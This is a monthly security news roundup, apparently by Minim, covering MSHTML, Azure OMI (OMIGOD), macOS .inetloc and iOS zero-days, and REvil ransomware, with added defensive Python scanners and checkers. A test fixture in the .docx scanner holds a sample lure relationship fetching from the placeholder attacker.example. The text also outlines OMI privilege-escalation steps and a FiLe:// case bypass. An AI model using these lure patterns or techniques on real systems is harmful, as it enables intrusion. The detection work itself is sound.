Sam Stelfox

Enterprise Cybersecurity Roundup [September 2021]

  • Critical vulnerabilities found in Azure and the Internet Explorer browser engine
  • Zero-day attack vectors located in macOS and iOS devices
  • REvil Ransomware-as-a-Service organization returns from hiatus

<img src="enterprise-cybersecurity-roundup-minim-sep-2021.png" alt="enterprise cybersecurity roundup september 2021 minim">

Minim's cybersecurity roundup is a monthly digest of the latest security threats, such as malware, breaches, vulnerabilities, and more. Where possible, we provide additional documentation in the form of discovery reports and share best practices. To stay informed, subscribe to our newsletter at the bottom of the page. 

Critical vulnerabilities in Microsoft MSHTML and Azure 

Microsoft software had over 90 vulnerabilities reported in September, including the zero-day CVE-2021-40444, which allows remote code execution (RCE). The flaw lives in MSHTML, the browser engine behind Internet Explorer that Office also uses to render HTML content; it affects Windows Server 2008 through 2019 and Windows 8.1 through 10 and carries a CVSS score of 8.8. Matthew Warner, CTO of Blumira, explains that attackers deliver it through a crafted Office document that loads a malicious ActiveX control, which can lead to full compromise of the Windows system.

Security researchers at McAfee note that a default protection applies: files downloaded from the Internet carry Windows' Mark of the Web (MoTW), which makes Office open them in Protected View, and in Protected View the ActiveX control that delivers the compromise is not executed. Still, they warn that users who suffer from "confirmation fatigue" (i.e., users who dismiss the Protected View banner out of annoyance) can trigger the exploit by clicking through it. The delivery path matters too: the exploit can fire from the Windows Explorer preview pane without the document being opened, whereas in Outlook the recipient must actually open the attachment for the malicious code to run.

The Microsoft Security Response Center (MSRC) and other security researchers advise applying the patch published on 09/14/2021 to defend against the attack. Microsoft further stated on September 23rd that "customers whose Windows devices are configured to receive automatic updates do not need to take any further action." For those who cannot apply the patch immediately, Microsoft's workarounds are to disable the installation of ActiveX controls in Internet Explorer (via the registry or Group Policy) and to disable the preview pane in Windows Explorer, while Blumira recommends educating end users about Protected View.

To test whether a Windows system is susceptible to CVE-2021-40444, exploit developer lockedbyte has published a Proof of Concept (PoC) that triggers the vulnerability with a benign payload, so it shows a system's current standing without doing damage. As with any PoC, run it only on isolated test systems you control, never on production machines.
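A practitioner's first question is how to spot such a document before a user previews it. The following Python scanner is an added example, not code from Minim, Microsoft, McAfee or Blumira: it unzips an Office Open XML package and flags relationships that point an OLE object at an external MHTML URL, the pattern the in-the-wild CVE-2021-40444 lures used to pull in the HTML that loads the ActiveX control. The two sample documents are constructed in memory and attacker.example is a placeholder, not a real indicator.

```python
"""Scan a .docx for the relationship pattern used by CVE-2021-40444 lures:
an OLE object whose target is an external MHTML URL. Added example; the two
sample documents are constructed in memory and the host name is a placeholder."""
from __future__ import annotations
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def scan_relationships(rels_xml: bytes, part_name: str) -> list:
    """Return one finding per suspicious <Relationship> in a .rels part."""
    findings = []
    for rel in ET.fromstring(rels_xml).iter(RELS_NS + "Relationship"):
        target = rel.get("Target", "")
        external = rel.get("TargetMode", "Internal").lower() == "external"
        match = SCHEME_RE.match(target)
        scheme = match.group(1).lower() if match else ""
        reasons = []
        # Lures seen in the wild used an "mhtml:...!x-usc:..." URL to fetch the HTML stage
        if scheme == "mhtml" or "!x-usc:" in target.lower():
            reasons.append("MHTML target")
        # A legitimate OLE object is embedded in the package; one fetched over the network is not normal
        if external and rel.get("Type") == OLE_REL:
            reasons.append("external OLE object")
        if reasons:
            findings.append({"part": part_name, "id": rel.get("Id"),
                             "target": target, "reasons": reasons})
    return findings


def scan_docx(data: bytes) -> list:
    """Walk every .rels part in the package (document, headers, footers, ...)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.endswith(".rels"):
                findings.extend(scan_relationships(pkg.read(name), name))
    return findings


def build_docx(rels_xml: str) -> bytes:
    """Constructed minimal package: enough for the scanner, not a document Word would open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_OPEN = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')

BENIGN_RELS = RELS_OPEN + (
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/styles" Target="styles.xml"/></Relationships>')

# attacker.example is a placeholder host, not a real indicator of compromise.
LURE_RELS = RELS_OPEN + (
    f'<Relationship Id="rId5" Type="{OLE_REL}" TargetMode="External" '
    'Target="mhtml:http://attacker.example/side.html!x-usc:http://attacker.example/side.html"/>'
    '</Relationships>')

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("lure", LURE_RELS)):
        print(label, scan_docx(build_docx(rels)))
```

Run it over a mail-gateway quarantine or a file share and detonate any hit in a sandbox. Like any structural signature it catches the known delivery shape rather than every possible variant, so it complements the patch and the ActiveX workaround rather than replacing them.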

Meanwhile, security researchers at Wiz found and analyzed four vulnerabilities in an agent that Azure installs on Linux VMs, estimated to affect over 65% of Azure customers before the patch:

  • CVE-2021-38647 (Critical, CVSS 9.8): Unauthenticated remote code execution as root, reachable wherever the OMI agent's HTTPS management port (5986, the same port WinRM uses; OMI can also listen on 5985 and 1270) is exposed to the network.
  • CVE-2021-38648 (High, CVSS 7.8): Local privilege escalation. Intercept the communication between the omicli client and omiengine, record an omicli execution request, strip the authentication handshake from it, and replay it to execute a command as root.
  • CVE-2021-38645 (High, CVSS 7.8): Local privilege escalation. Send omiengine a request with falsified credentials carrying the command to run (the write-up uses `id >> /tmp/win` to prove execution), then from a second thread send an authentication request followed by a forged "successful authentication" response claiming uid=0 gid=0, so the queued command runs as root.
  • CVE-2021-38649 (High, CVSS 7.0): Local privilege escalation.

According to Wiz, these vulnerabilities affect Azure customers running Linux machines (more than half of all Azure instances) who use services such as Azure Automation, Azure Log Analytics, Azure Configuration Management, and others. Enabling those services installs the Open Management Infrastructure (OMI) agent on the Linux VM automatically, often without the customer being aware of it. OMI works much like Windows Management Instrumentation (WMI), acting as a Common Information Model (CIM) management server. Because all four vulnerabilities live in OMI, Wiz has cheekily titled the set OMIGOD.

Microsoft has released a patch for these vulnerabilities as of September 8th, 2021: the fixed agent is OMI version 1.6.8-1. Because the fix was not automatically applied to every VM at first, check the installed OMI version on each Linux VM rather than assuming the platform updated it, and confirm that omiserver is not listening on the network unless you need it to. To see if you may be affected or to read a programmatic breakdown of each vulnerability, visit Wiz.io.
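To turn that checklist into something you can run on a Linux VM, the following Python script is an added example (not Wiz or Microsoft code): it reads the installed omi package version through dpkg or rpm, compares it with the fixed release 1.6.8-1, and parses `ss -Hltn` output to report whether omiserver has a TCP listener on the ports OMI can open (5985, 5986, 1270). The sample ss output is constructed; the version-parsing rule and the port list are assumptions stated in the comments.

```python
"""Check a Linux host's OMI agent against the OMIGOD fix level (1.6.8-1) and
report whether OMI's TCP ports have a listener. Added example, not Wiz or
Microsoft code; the sample `ss` output below is constructed."""
from __future__ import annotations
import re
import shutil
import subprocess

PATCHED_OMI = (1, 6, 8, 1)          # OMI 1.6.8-1 fixes CVE-2021-38645/38647/38648/38649
OMI_TCP_PORTS = {5985, 5986, 1270}  # assumption: the network listeners OMI can be configured to open


def parse_omi_version(text: str) -> tuple:
    """Turn "1.6.8-1", "1.6.8.1" or "omi-1.6.8-1.x86_64" into a 4-tuple.
    Assumption: the first four integers are major.minor.patch-release."""
    nums = [int(n) for n in re.findall(r"\d+", text)][:4]
    return tuple(nums + [0] * (4 - len(nums)))


def omi_is_patched(version_text: str) -> bool:
    return parse_omi_version(version_text) >= PATCHED_OMI


def installed_omi_version() -> str | None:
    """Ask the package manager for the installed omi package, if any."""
    for cmd in (["dpkg-query", "-W", "-f=${Version}", "omi"],
                ["rpm", "-q", "--qf", "%{VERSION}-%{RELEASE}", "omi"]):
        if shutil.which(cmd[0]) is None:
            continue
        res = subprocess.run(cmd, capture_output=True, text=True)
        if res.returncode == 0 and res.stdout.strip():
            return res.stdout.strip()
    return None


def exposed_omi_ports(ss_output: str) -> set:
    """Parse `ss -Hltn` lines (State Recv-Q Send-Q Local:Port Peer:Port) and
    return the OMI ports that have a TCP listener."""
    ports = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        port = fields[3].rsplit(":", 1)[-1]      # works for 0.0.0.0:5986, *:5985 and [::]:1270
        if port.isdigit() and int(port) in OMI_TCP_PORTS:
            ports.add(int(port))
    return ports


# Constructed sample of `ss -Hltn` output for a VM with OMI exposed on both HTTP ports.
SAMPLE_SS = """LISTEN 0 128   0.0.0.0:22      0.0.0.0:*
LISTEN 0 128   0.0.0.0:5986    0.0.0.0:*
LISTEN 0 128   [::]:5985       [::]:*
"""

if __name__ == "__main__":
    version = installed_omi_version()
    if version is None:
        print("OMI package not installed")
    else:
        state = "patched" if omi_is_patched(version) else "VULNERABLE"
        print(f"OMI {version}: {state}")
    if shutil.which("ss"):
        out = subprocess.run(["ss", "-Hltn"], capture_output=True, text=True).stdout
        print("OMI TCP listeners:", sorted(exposed_omi_ports(out)) or "none")
```

A patched version with ports still open is the normal state for hosts that genuinely need remote management; an unpatched version with 5986 reachable from the Internet is the CVE-2021-38647 case and should be treated as an incident, not a ticket.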

Zero-day bugs found in iOS and macOS devices 

Independent security researcher Park Minchan discovered that macOS Finder housed a zero-day RCE vulnerability: it executes commands embedded in .inetloc files. Affecting macOS Big Sur and earlier versions, the bug, as Minchan specifies in the comments on SSD Disclosure's advisory, can be triggered through various applications including Mail, iMessage, and even Microsoft Office. Delivered as an email attachment, the file runs when clicked without any prompt or warning.

.inetloc files serve as shortcuts to Internet locations, pointing to resources like RSS feeds and telnet hosts. The filetype is also known to carry server addresses and credentials for SSH/telnet connections. Although Apple did not assign this vulnerability a CVE, it was silently patched by blocking the file:// prefix that lets the shortcut run a local file. Further testing showed, however, that the check was case sensitive (it matched only the lowercase spelling), so it can be bypassed by altering the case of the scheme to something like FiLe://.

Bleeping Computer also tested the exploit and found that the PoC code passed undetected through the anti-malware engines on VirusTotal, which indicates that anti-malware software may not thwart this attack. Treat any .inetloc file attachments on macOS machines with utmost caution, especially until an officially recognized patch is released.
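The case-sensitivity mistake described above is a classic scheme-matching bug, so here is one way a mail gateway or endpoint tool could vet .inetloc attachments. This is an added example, not Apple's code or the researcher's PoC: it parses the shortcut's plist (XML or binary) with plistlib, normalises the URL scheme with urllib.parse, and contrasts a literal prefix test of the kind FiLe:// slips past with a normalised comparison. The sample files and the allowlist of expected schemes are constructed assumptions.

```python
"""Vet .inetloc shortcut files for the file: scheme the way the silent fix
should have: after normalising the scheme, not by literal prefix.
Added example, not Apple's code; samples are constructed with plistlib."""
from __future__ import annotations
import plistlib
from urllib.parse import urlsplit

# Assumption: schemes an .inetloc shortcut is normally expected to carry.
EXPECTED_SCHEMES = {"http", "https", "ftp", "feed", "ssh", "telnet", "afp", "smb", "vnc"}


def naive_is_local(url: str) -> bool:
    """A literal prefix test: exactly the kind of check a FiLe:// spelling slips past."""
    return url.startswith("file://")


def is_local_file_url(url: str) -> bool:
    """Normalised check: urlsplit lower-cases the scheme, so case variants are caught."""
    return urlsplit(url.strip()).scheme == "file"


def inspect_inetloc(data: bytes) -> dict:
    """Parse an .inetloc plist (XML or binary) and return the URL, scheme and a verdict.
    The URL key is a plain string in the plist, so plistlib handles both encodings."""
    url = plistlib.loads(data).get("URL", "")
    scheme = urlsplit(url.strip()).scheme
    if scheme == "file":
        verdict = "block"          # would hand Finder a local path to launch
    elif scheme in EXPECTED_SCHEMES:
        verdict = "allow"
    else:
        verdict = "review"         # unknown scheme: not a proven exploit, but not a normal shortcut
    return {"url": url, "scheme": scheme, "verdict": verdict}


def make_inetloc(url: str) -> bytes:
    """Constructed sample: the same plist layout real .inetloc files use."""
    return plistlib.dumps({"URL": url}, fmt=plistlib.FMT_XML)


if __name__ == "__main__":
    for url in ("https://example.com/feed.rss",
                "FiLe:///Applications/Calculator.app",
                "gopher://example.com/"):
        print(url, "naive:", naive_is_local(url), "->", inspect_inetloc(make_inetloc(url)))
```

The point of `is_local_file_url` is that the scheme is compared after parsing rather than by string prefix; that also catches `file:/path` with a single slash, which a `file://` prefix test misses as well. Blocking only what is proven dangerous and routing unknown schemes to review keeps the gateway from silently dropping legitimate RSS and SSH shortcuts.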

Alongside this vulnerability, four zero-day bugs in iOS were published by security researcher illusionofchaos on Habr. Each lets an ordinary user-installed app read sensitive information it has no permission for; the researcher's PoC apps display what they collect in their user interface:

  • Gamed 0-day (PoC: ios-gamed-0day): Any app installed from the App Store can obtain the Apple ID email, full name and Apple ID authentication token, gain read access to the Core Duet database (interactions with contacts from Mail, SMS, iMessage, etc.) and read contact metadata, by exploiting gaps in the gamed XPC service's checks on its caller.
  • Nehelper Enumerate Installed Apps 0-day (PoC: ios-nehelper-enum-apps-0day): Given a bundle ID (the unique string that identifies an app), an app can determine whether that application is installed on the device.
  • Nehelper Wifi Info 0-day (PoC: ios-nehelper-wifi-info-0day): Obtains Wi-Fi information without the required entitlement; a crafted sdk-version parameter skips the com.apple.developer.networking.wifi-info entitlement check.
  • Analyticsd (PoC: ios-analyticsd-pre14.7-exploit): Patched in iOS 14.7. Allowed any user-installed application to read analytics logs containing medical information, device usage, screen time, session counts, bundle IDs, device accessory information, etc. The leak persisted even when the "Share analytics" setting was disabled.

All of these vulnerabilities have been reported to Apple, but Apple has not assigned any official CVEs. Most of Apple's responses say only that the reports are being investigated further, and illusionofchaos states that, as of the September 20th security content list for iOS 15.0, these vulnerabilities remain unpatched. The follow-up article likewise mentions no official fix. In the meantime, iOS users will have to watch patiently for an official update from Apple.

REvil returns: a recap of the dangers of ransomware 

News on the Ransomware-as-a-Service (RaaS) organization REvil had been quiet since the July 2nd attack carried out through Kaseya's VSA remote-management software, which managed service providers use to administer their customers' systems. However, REvil has now resurfaced under the same name on hacking forums. Their dark web servers appear to have been reactivated, a fresh sample of REvil ransomware has been uploaded to VirusTotal, and the login functionality on their Tor payment site is working again.

Bleeping Computer reports on the possible reasons for the hiatus. One REvil operator claims they were merely taking a break, while posts on hacking forums suggest REvil went into hiding from law enforcement after the disappearance of the threat actor "Unknown" (or "UNKN"). Unknown understood REvil's business model and had handled recruitment for the RaaS operation. Posts (translated from Russian) about the impact of his disappearance describe the struggle that followed:

As Unknown (aka 8800) disappeared, we (the coders) backed up and turned off all the servers. Thought that he was arrested. We tried to search, but to no avail. We waited - he did not show up and we restored everything from backups. After UNKWN disappeared, the hoster informed us that the Clearnet servers were compromised and they deleted them at once. We shut down the main server with the keys right afterward.

Kaseya decryptor, which was allegedly leaked by the law enforcement, in fact, was leaked by one of our operators during the generation of the decryptor.

(REvil, as quoted by Bleeping Computer)

Hacking forum posts from Unknown in July state that REvil ransomware is "written in pure C, using inline assembler with the possibility of modifying functionality out of the box." Research from Palo Alto Networks indicates REvil gains network access through phishing emails with malicious file attachments or through Remote Desktop Protocol (RDP) with compromised credentials. Some incidents, however, have exploited known vulnerabilities (CVEs) in Microsoft Exchange Server and SonicWall appliances. Once inside, REvil is known for its devotion to double extortion: encrypting data to lock victims out while also exfiltrating it and threatening to leak it publicly.

With evidence pointing to REvil's resurgence, watching networks closely and implementing ransomware prevention best practices will be vital to protecting assets. Ransomware has been merciless in halting operations, going as far as impeding surgical procedures and healthcare services. It is recommended to keep offline backups of company data regularly updated, whether in private storage or a cloud storage system, and to periodically test that they restore; a backup that the ransomware can reach, or that has never been restored, is not a backup. For more best practices on ransomware protection, prevention, and post-infection remediation, visit StopRansomware.gov.
